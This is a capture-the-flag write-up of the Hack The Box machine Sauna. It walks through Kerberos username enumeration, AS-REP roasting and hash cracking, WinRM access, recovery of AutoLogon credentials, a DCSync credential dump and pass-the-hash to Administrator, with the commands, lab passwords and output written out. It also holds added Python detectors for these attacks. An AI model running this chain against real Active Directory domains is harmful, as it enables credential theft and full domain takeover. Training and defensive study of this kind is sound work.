Sauna

AD box on HTB.

Enumeration:

As always we are going to start with nmap to scan for open ports:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oN nmap/services.nmap -vv 10.129.135.36
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-03 14:12 EDT
Nmap scan report for 10.129.135.36                                                   
Host is up, received echo-reply ttl 127 (0.14s latency).                                                                                                                   
Scanned at 2025-09-03 14:12:14 EDT for 257s
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION             
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus      
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0           
|_http-server-header: Microsoft-IIS/10.0                                             
| http-methods:                                                                      
|   Supported Methods: OPTIONS TRACE GET HEAD POST                 
|_  Potentially risky methods: TRACE                                                 
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-04 01:13:16Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127                  
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
|_http-title: Not Found                                                              
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
<snipped>                                                                                                  
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>
|_clock-skew: 7h00m03s
<snipped>

We have the default open ports of a domain controller, and this time HTTP is also running on port 80. The LDAP banner reveals the domain name EGOTISTICAL-BANK.LOCAL, and the service info shows the host name SAUNA.

We can also see that the clock skew is too great (about seven hours), so I will use ntpdate to synchronize with the target machine, since Kerberos rejects requests whose timestamps differ from the KDC's by more than five minutes by default.

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ sudo ntpdate 10.129.135.36

And I will add the IP and the corresponding domain name to the hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ cat /etc/hosts        
127.0.0.1       localhost
127.0.1.1       kali
<snipped>

10.129.135.36 SAUNA.EGOTISTICAL-BANK.LOCAL EGOTISTICAL-BANK.LOCAL SAUNA

User Enumeration:

Now I will start with the web application. Let's open it up with Firefox:

If we go to the About Us page, we find some potential usernames:

I will save those names into a file and use a tool called username-wordlist-generator (userlistcreator.py) to create a list of different username formats for each name:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ cat user.txt
Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver

┌──(kali㉿kali)-[/opt/Tools/username-wordlist-generator]
└─$ python3 userlistcreator.py


                    USERNAME GENERATOR
--------------------------------------------------------
Help :
     Add name of users to :/opt/Tools/username-wordlist-generator/user.txt
             (Then Restart The Program)
                          v2.0
--------------------------------------------------------
[*] Names Loaded :
        + Fergus Smith
        + Hugo Bear
        + Steven Kerb
        + Shaun Coins
        + Bowie Taylor
        + Sophie Driver

[*] Started Converting.....
[*] Successfully Created Usernames
[*] Saving File....
[*] File Saved to : /opt/Tools/username-wordlist-generator/output.txt
[*] Happy Hacking .............

If we take a look at the output.txt file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ cat /opt/Tools/username-wordlist-generator/output.txt
Fergus-Smith
Fergus_Smith
Fergus.Smith
Fergus Smith
FergusSmith
FSmith
FergusS
F-Smith
F_Smith
F.Smith
Fergus-S
Fergus_S
Fergus.S
FS
Hugo-Bear
<snipped>

We can also convert all entries in this output file to lowercase, so that we can also try them as passwords, for example.

Now I will use kerbrute to enumerate those users to try to find any valid domain users:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ kerbrute userenum -d egotistical-bank.local --dc 10.129.135.36 /opt/Tools/username-wordlist-generator/output.txt
                                                                                     
    __             __               __                                               
   / /_____  _____/ /_  _______  __/ /____                                           
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \                                                                                                                                
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/                                          
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                           
                                                                                     
Version: v1.0.3 (9dad6e1) - 09/03/25 - Ronnie Flathers @ropnop                       
                                                                                     
2025/09/03 14:19:21 >  Using KDC(s):                                                 
2025/09/03 14:19:21 >   10.129.135.36:88                                             
                                                                                     
2025/09/03 14:19:21 >  [+] VALID USERNAME:       FSmith@egotistical-bank.local       
2025/09/03 14:19:24 >  Done! Tested 84 usernames (1 valid) in 3.314 seconds

Only one name from output.txt, FSmith, is a valid domain user.

Let's save it into a file (users.txt) for the next step.

AS-REP Roasting:

With a valid username we can try several attacks, such as password spraying or AS-REP Roasting.

I tried AS-REP Roasting using impacket-GetNPUsers:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ impacket-GetNPUsers egotistical-bank.local/ -usersfile users.txt                                                  
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b01a685e5e90d37162daad1a906e3a40$a8820e46d7ef70264b6dc67995452dae75fef5cd7513536277411af47b17dcc1b26453515f6fdf35dd586ddd12021e
9d9ea8a07702a56b10c3992b0678c6d41888346629e07c90e2c4b01500c79f41cca8440f1dc4c802f72bcfbea2ca2005cfcaeb5ef54cb32d9473f39bca25582e7967048fbeb67bde1dc976b7dbc6098421764fedfe2
c55302e36951010673f166d2f3507e12f683568743560aa2ccc39fa4f422e03683b1c4b3d16d99d1763d6a08cb6f6e53282b7d7003e6a4ef8deb62ccbadcc31da2cbbcd3aacb3ac7913415e746a44e3c0d10a4e096d
2c072fa44152012fece764a351a58982fab79d456f8a9f577f8bc3738735172d78b23484b045

And indeed fsmith is an AS-REP roastable user: the account does not require Kerberos pre-authentication, so the KDC returns an AS-REP encrypted with the user's password-derived key, which can be cracked offline.

Now I will try to crack it using hashcat:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ hashcat fsmith.hash /usr/share/wordlists/rockyou.txt      
hashcat (v6.2.6) starting in autodetect mode

<snipped>

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b01a685e5e90d37162daad1a906e3a40$a8820e46d7ef70264b6dc67995452dae75fef5cd7513536277411af47b17dcc1b26453515f6fdf35dd586ddd12021e
9d9ea8a07702a56b10c3992b0678c6d41888346629e07c90e2c4b01500c79f41cca8440f1dc4c802f72bcfbea2ca2005cfcaeb5ef54cb32d9473f39bca25582e7967048fbeb67bde1dc976b7dbc6098421764fedfe2
c55302e36951010673f166d2f3507e12f683568743560aa2ccc39fa4f422e03683b1c4b3d16d99d1763d6a08cb6f6e53282b7d7003e6a4ef8deb62ccbadcc31da2cbbcd3aacb3ac7913415e746a44e3c0d10a4e096d
2c072fa44152012fece764a351a58982fab79d456f8a9f577f8bc3738735172d78b23484b045:Thestrokes23
                                                           
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b01a685...84b045
Time.Started.....: Wed Sep  3 14:21:25 2025 (7 secs)
Time.Estimated...: Wed Sep  3 14:21:32 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1462.4 kH/s (0.95ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10540032/14344385 (73.48%)
Rejected.........: 0/10540032 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> ThatHadToHurt
Hardware.Mon.#1..: Util: 23%

<snipped>

Now we have valid credentials.
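From the defender's side, both steps above (the kerbrute user enumeration and the AS-REP roast of fsmith) leave traces on the domain controller. The following is an added example, not part of the original writeup or of any tool it uses, that runs over constructed 4768 events and user records: it flags TGTs issued without pre-authentication (the RC4 etype 23 case is the cheap-to-crack one that hashcat mode 18200 handled above), counts unknown-principal failures per source address to spot username guessing, and lists accounts carrying the userAccountControl flag that makes them roastable. The threshold, field layout and sample data are assumptions.

```python
"""Added example (not from the original writeup or any of its tools).

Defender-side checks for the two Kerberos steps in this writeup:
  * username enumeration (kerbrute): bursts of 4768 failures with
    status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) from one source address,
  * AS-REP roasting: 4768 where a TGT was issued with PreAuthType 0
    (no pre-authentication), worst when the ticket etype is RC4 (0x17),
  * the account attribute that makes an account roastable at all.
Events are dicts using the field names of Security event 4768.
Assumes failure auditing for "Kerberos Authentication Service" is on.
"""
from collections import Counter

UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl flag
RC4_HMAC = "0x17"                    # etype 23 -> hashcat mode 18200
ENUM_THRESHOLD = 20                  # assumed tuning value, not from the page


def asrep_roast_events(events):
    """Return (user, source_ip, rc4) for every TGT issued without pre-auth."""
    hits = []
    for e in events:
        if e.get("EventID") != 4768 or e.get("Status") != "0x0":
            continue                     # only successful TGT issuance matters
        if e.get("PreAuthType") != "0":  # 0 = logon without pre-authentication
            continue
        hits.append((e["TargetUserName"], e["IpAddress"],
                     e.get("TicketEncryptionType") == RC4_HMAC))
    return hits


def enumeration_sources(events, threshold=ENUM_THRESHOLD):
    """Source addresses with >= threshold 'unknown principal' failures."""
    unknown = Counter(
        e["IpAddress"] for e in events
        if e.get("EventID") == 4768 and e.get("Status") == "0x6"
    )
    return {ip: n for ip, n in unknown.items() if n >= threshold}


def accounts_without_preauth(users):
    """Accounts with 'Do not require Kerberos preauthentication' set."""
    return sorted(u["sAMAccountName"] for u in users
                  if u["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH)


# Constructed sample data, not real log lines from the target.
def _evt(user, ip, status, preauth, etype):
    return {"EventID": 4768, "TargetUserName": user, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth,
            "TicketEncryptionType": etype}

SAMPLE_EVENTS = (
    # 83 guesses that do not exist -> KDC_ERR_C_PRINCIPAL_UNKNOWN
    [_evt(f"guess{i}", "10.10.14.5", "0x6", "-", "0xffffffff") for i in range(83)]
    # the one valid name, answered with an RC4 AS-REP and no pre-auth
    + [_evt("fsmith", "10.10.14.5", "0x0", "0", "0x17")]
    # a normal logon (constructed user): timestamp pre-auth, AES ticket
    + [_evt("jdoe", "10.10.10.50", "0x0", "2", "0x12")]
)

SAMPLE_USERS = [
    {"sAMAccountName": "fsmith", "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x10200},
    {"sAMAccountName": "svc_loanmgr", "userAccountControl": 0x10200},
]

if __name__ == "__main__":
    for user, ip, rc4 in asrep_roast_events(SAMPLE_EVENTS):
        print(f"AS-REP without pre-auth: {user} from {ip} (RC4={rc4})")
    for ip, n in enumeration_sources(SAMPLE_EVENTS).items():
        print(f"possible username enumeration from {ip}: {n} unknown principals")
    print("pre-auth disabled:", accounts_without_preauth(SAMPLE_USERS))
```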

There were no interesting SMB shares with these credentials.

BloodHound:

Since we have valid credentials, it is time for BloodHound. Let's collect the domain data using netexec and upload the output to BloodHound:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ netexec ldap 10.129.135.36 -u fsmith -p Thestrokes23 --bloodhound -c all --dns-server 10.129.135.36
LDAP        10.129.135.36   389    SAUNA            [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
LDAP        10.129.135.36   389    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
LDAP        10.129.135.36   389    SAUNA            Resolved collection methods: group, objectprops, rdp, localadmin, psremote, acl, session, trusts, dcom, container
LDAP        10.129.135.36   389    SAUNA            Done in 00M 47S
LDAP        10.129.135.36   389    SAUNA            Compressing output into /home/kali/.nxc/logs/SAUNA_10.129.135.36_2025-09-03_142626_bloodhound.zip

Start BloodHound:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]                                                                                                                        
└─$ sudo bloodhound                                                                                                                                                        
[sudo] password for kali:                                                                                                                                                  
                                                                                                                                                                           
 Starting neo4j                                                                                                                                                            
Neo4j is not running.                                                                                                                                                      
Directories in use:                                                                                                                                                        
home:         /usr/share/neo4j                                                                                                                                             
config:       /usr/share/neo4j/conf                                                                                                                                        
logs:         /etc/neo4j/logs                                                                                                                                              
plugins:      /usr/share/neo4j/plugins                                                                                                                                     
import:       /usr/share/neo4j/import                                                                                                                                      
data:         /etc/neo4j/data                                                                                                                                              
certificates: /usr/share/neo4j/certificates                                                                                                                                
licenses:     /usr/share/neo4j/licenses                                                                                                                                    
run:          /var/lib/neo4j/run                                                                                                                                           
Starting Neo4j.                                                                                                                                                            
Started neo4j (pid:10457). It is available at http://localhost:7474                                                                                                        
There may be a short delay until the server is ready.                                                                                                                      
...................................................                                                                                                                        
 Bloodhound will start                                                                                                                                                     
                                                                                                                                                                           
 IMPORTANT: It will take time, please wait...

<snipped>

 opening http://127.0.0.1:8080 
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ mv /home/kali/.nxc/logs/SAUNA_10.129.135.36_2025-09-03_142626_bloodhound.zip .

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ unzip SAUNA_10.129.135.36_2025-09-03_142626_bloodhound.zip 
Archive:  SAUNA_10.129.135.36_2025-09-03_142626_bloodhound.zip
 extracting: SAUNA_10.129.135.36_2025-09-03_142626_gpos.json  
 extracting: SAUNA_10.129.135.36_2025-09-03_142626_groups.json  
 extracting: SAUNA_10.129.135.36_2025-09-03_142626_containers.json  
 extracting: SAUNA_10.129.135.36_2025-09-03_142626_users.json  
 extracting: SAUNA_10.129.135.36_2025-09-03_142626_computers.json  
 extracting: SAUNA_10.129.135.36_2025-09-03_142626_domains.json  
 extracting: SAUNA_10.129.135.36_2025-09-03_142626_ous.json

I did not find anything interesting, but fsmith is a member of Remote Management Users, which means we can connect to the machine over WinRM.

Privilege Escalation:

AutoLogon Credentials:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]                                                                                                                        
└─$ evil-winrm -i 10.129.135.36 -u fsmith -p Thestrokes23                                                                                                                  
                                                                                                                                                                           
Evil-WinRM shell v3.7                                                                                                                                                      
                                                                                                                                                                           
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                           
                                                                                                                                                                           
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                      
                                                                                                                                                                           
Info: Establishing connection to remote endpoint

I will upload winPEAS to the target machine to look for any attack vector we can use to reach Domain Admins.

*Evil-WinRM* PS C:\Users\FSmith> upload winPEASany.exe   
                                                                                                                  
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Sauna/winPEASany.exe to C:\Users\FSmith\winPEASany.exe                                                          
                                                                                                                                                                           
Data: 13541376 bytes of 13541376 bytes copied                                                                                                                              
                                                                                                                                                                           
Info: Upload successful!

Now let's run winPEASany.exe:

*Evil-WinRM* PS C:\Users\FSmith> .\winPEASany.exe
 [!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
                                                                                                                                                                           
<snipped>

  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links

After going through the results I found these AutoLogon credentials. The registry lists the user as svc_loanmanager, but the domain account is svc_loanmgr, and the password works for it:

╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

Let's validate the credentials with netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ netexec smb 10.129.135.36 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
SMB         10.129.135.36   445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.135.36   445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!

DCSync Attack:

Now, going back to BloodHound and clicking Outbound Object Control to look for interesting ACLs this user has over other objects:

We can see that the user svc_loanmgr has GetChangesAll and GetChanges (DS-Replication-Get-Changes-All and DS-Replication-Get-Changes) on the domain object, which means we have DCSync rights: with those two replication rights an account can ask the DC to replicate any account's secrets, including password hashes, just as another domain controller would.

Let's perform the DCSync via impacket-secretsdump:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ impacket-secretsdump egotistical-bank.local/svc_loanmgr:'Moneymakestheworldgoround!'@10.129.135.36                
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies                                                                                                 
                                                                                     
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied                                                                                         
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                                              
[*] Using the DRSUAPI method to get NTDS.DIT secrets      
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1****************:::                                     
<snipped>                                                                                                                                   
[*] Cleaning up... 
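The rights BloodHound showed for svc_loanmgr are also what a defender watches for: each DCSync replication request is audited on the DC as Security event 4662 on the domain object, with the replication extended-right GUIDs in its Properties field. The following is an added example, not from the writeup or from impacket, that flags such events when the subject is not a domain controller computer account, and audits a list of ACEs on the domain object for principals holding both rights. The event dicts, ACE tuples, the allowlist parameters and the unrelated placeholder GUID are constructed assumptions.

```python
"""Added example (not from the original writeup or from impacket).

DCSync leaves a trace: every replication request is audited on the DC as
Security event 4662 against the domain object, and the Properties field
lists the extended rights that were exercised.  Domain controllers (computer
accounts, names ending in $) replicate legitimately; a user account doing
it is the DCSync signal.  Events are dicts with 4662's field names and the
sample data is constructed.
"""
import re

# Extended rights behind the GetChanges / GetChangesAll edges BloodHound shows
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
REPLICATION_RIGHTS = {GET_CHANGES, GET_CHANGES_ALL}

CONTROL_ACCESS = 0x100   # AccessMask bit: an extended right was exercised
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")


def replication_rights_used(properties):
    """Replication extended rights found in a 4662 Properties field."""
    return set(GUID_RE.findall(properties.lower())) & REPLICATION_RIGHTS


def is_dcsync(event, allowed=()):
    """True for a 4662 exercising replication rights from a non-DC account.

    `allowed` names non-DC accounts that replicate legitimately (assumed
    input, e.g. a directory-sync service account).
    """
    if event.get("EventID") != 4662:
        return False
    if int(event.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
        return False
    subject = event.get("SubjectUserName", "")
    if subject.endswith("$") or subject.lower() in {a.lower() for a in allowed}:
        return False
    return bool(replication_rights_used(event.get("Properties", "")))


def dcsync_alerts(events, allowed=()):
    """(subject, object, rights used) for each suspicious event."""
    return [(e["SubjectUserName"], e["ObjectName"],
             sorted(replication_rights_used(e["Properties"])))
            for e in events if is_dcsync(e, allowed)]


def dcsync_capable_trustees(aces, expected=()):
    """Preventive audit: trustees holding BOTH rights on the domain object.

    `aces` is a list of (trustee, extended-right GUID); `expected` lists the
    principals that are supposed to hold them (supplied by the caller).
    """
    held = {}
    for trustee, guid in aces:
        held.setdefault(trustee, set()).add(guid.lower())
    skip = {t.lower() for t in expected}
    return sorted(t for t, rights in held.items()
                  if REPLICATION_RIGHTS <= rights
                  and not t.endswith("$") and t.lower() not in skip)


# Constructed sample data, not real log lines from the target.
DOMAIN_DN = "DC=EGOTISTICAL-BANK,DC=LOCAL"
BOTH = ("Control Access\n\t{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2}"
        "\n\t{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}")

def _evt(subject, mask, props):
    return {"EventID": 4662, "SubjectUserName": subject,
            "ObjectName": DOMAIN_DN, "AccessMask": mask, "Properties": props}

SAMPLE_EVENTS = [
    _evt("svc_loanmgr", "0x100", BOTH),   # secretsdump-style replication pull
    _evt("SAUNA$", "0x100", BOTH),        # the DC itself replicating: expected
    _evt("svc_loanmgr", "0x20",           # write property with a placeholder GUID
         "Write Property\n\t{11111111-2222-3333-4444-555555555555}"),
]

SAMPLE_ACES = [
    ("svc_loanmgr", GET_CHANGES), ("svc_loanmgr", GET_CHANGES_ALL),
    ("SAUNA$", GET_CHANGES), ("SAUNA$", GET_CHANGES_ALL),
    ("Administrators", GET_CHANGES), ("Administrators", GET_CHANGES_ALL),
    ("helpdesk", GET_CHANGES),            # one right only: cannot DCSync alone
]

if __name__ == "__main__":
    for subject, obj, rights in dcsync_alerts(SAMPLE_EVENTS):
        print(f"DCSync by {subject} on {obj}: {rights}")
    print("unexpected DCSync-capable trustees:",
          dcsync_capable_trustees(SAMPLE_ACES, expected=["Administrators"]))
```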

Now we can authenticate to the target as Administrator using the NT hash (pass-the-hash) with evil-winrm, or via psexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]                                  
└─$ evil-winrm -i 10.129.135.36 -u administrator -H 823452073d75b9d1****************            
                                         
Evil-WinRM shell v3.7
                                         
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                         
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                         
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
SAUNA
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::7c64:47f8:c009:bccb
   Link-local IPv6 Address . . . . . : fe80::7c64:47f8:c009:bccb%7
   IPv4 Address. . . . . . . . . . . : 10.129.135.36
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%7
                                       10.129.0.1

And we can read the flags:

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
be155c28c4c3d715****************
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\fsmith\Desktop\user.txt
5773859b9b0e369a****************
